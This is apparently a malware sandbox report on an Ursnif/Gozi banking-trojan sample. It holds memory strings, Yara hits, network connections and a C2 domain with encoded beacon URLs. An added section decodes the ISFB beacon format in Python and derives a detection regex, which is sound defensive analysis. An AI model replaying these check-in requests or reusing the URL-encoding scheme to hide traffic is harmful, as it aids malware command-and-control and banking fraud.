Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/ GlobalSign Root CA-R2 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com// equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/R equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/[ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: https://www.yahoo.com/u equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp | String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwv/CCpK equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwx equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'; equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com7 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comB equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comE equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comows\system32\jsproxy.dll equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.comzD( equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp | String found in binary or memory: www.yahoo.com{ equals www.yahoo.com (Yahoo)
Source: unknown | HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2
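
The GET requests above share the Gozi/ISFB beacon URL scheme: the bot base64-encodes an encrypted request blob, replaces `+` with `_2B` and `/` with `_2F`, splits the result with `/` at random positions, and wraps it in a fixed directory and a benign-looking file extension (`.crw`, `.gif`, `.jpeg` here). The same shape is sent both to the C2 host (soderunovos.website) and to legitimate sites such as yahoo.com and lycos.com, which answer 404, so a detection should key on the URL shape rather than the destination. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it undoes that transform for (host, path) pairs copied from the requests above, recovers the raw blob, and derives a proxy-log regex from the observed shape. The decoded bytes stay encrypted under the sample's configured key, which this example does not have, so it stops at the blob size; the extension list and the segment limits in the regex are assumptions taken only from the requests on this page.

```python
"""Recover the ISFB/Gozi beacon shape from the GET requests in this report.

Added example for this page; not code from Joe Sandbox or from the sample.
"""
import base64
import re

# (host, path) pairs copied from the "HTTP traffic detected" GET requests above.
OBSERVED = [
    ("yahoo.com",
     "/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/"
     "HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/"
     "3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw"),
    ("soderunovos.website",
     "/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/"
     "FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/"
     "g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/"
     "y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw"),
    # Redirect issued by Yahoo's login front end, not a beacon; kept to show it is rejected.
    ("login.yahoo.com", "/?.src=ym&pspid=159600001&activity=mail-direct"),
]

# Extensions seen on this page's beacons; an assumption drawn only from these requests.
BEACON_EXTENSIONS = ("crw", "gif", "jpeg")

# Heuristic proxy-log matcher derived from the observed shape: one short directory,
# six or more base64-alphabet segments, then a benign extension. The segment count and
# length bounds are assumptions fitted to the requests above, not a vendor signature.
BEACON_URL_RE = re.compile(
    r"^/[A-Za-z]+(?:/[A-Za-z0-9_]{1,30}){6,}\.(?:" + "|".join(BEACON_EXTENSIONS) + r")/?$"
)


def isfb_path_to_base64(path):
    """Undo the ISFB URL transform and return the base64 text, or None when the
    path does not fit the scheme (query string, wrong alphabet, bad length)."""
    path = path.strip("/")
    _directory, _, rest = path.partition("/")
    if not rest or "." not in rest:
        return None
    rest, ext = rest.rsplit(".", 1)
    if ext not in BEACON_EXTENSIONS:
        return None
    # The random '/' separators carry no data. Drop them before undoing the escapes,
    # because a separator may have been inserted inside an '_2B' or '_2F' sequence
    # (see "3izuuqgp_/2Beydbeu" in the yahoo.com request above).
    b64 = rest.replace("/", "").replace("_2B", "+").replace("_2F", "/")
    if not re.fullmatch(r"[A-Za-z0-9+/]+", b64) or len(b64) % 4:
        return None
    return b64


def decode_beacon(path):
    """Return the still-encrypted request blob for an ISFB-shaped path, else None."""
    b64 = isfb_path_to_base64(path)
    return None if b64 is None else base64.b64decode(b64, validate=True)


def summarize(observed):
    """Map each host that received an ISFB-shaped request to its blob sizes in bytes."""
    sizes = {}
    for host, path in observed:
        blob = decode_beacon(path)
        if blob is not None:
            sizes.setdefault(host, []).append(len(blob))
    return sizes


if __name__ == "__main__":
    for host, path in OBSERVED:
        shape = "matches" if BEACON_URL_RE.match(path) else "no match"
        print(f"{host:22} regex {shape:9} {summarize([(host, path)])}")
```

Both `.crw` requests decode to the same 144-byte blob size, which is what a fixed-format encrypted check-in looks like; the regex is the part worth carrying into a proxy-log rule, tuned against your own traffic before deployment, since six-plus random-looking path segments with an image extension is rare but not unique to this family.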

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                      Source: FpYf5EGDO9.exe, 00000000.00000002.510175221.00000000021AA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match; file source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY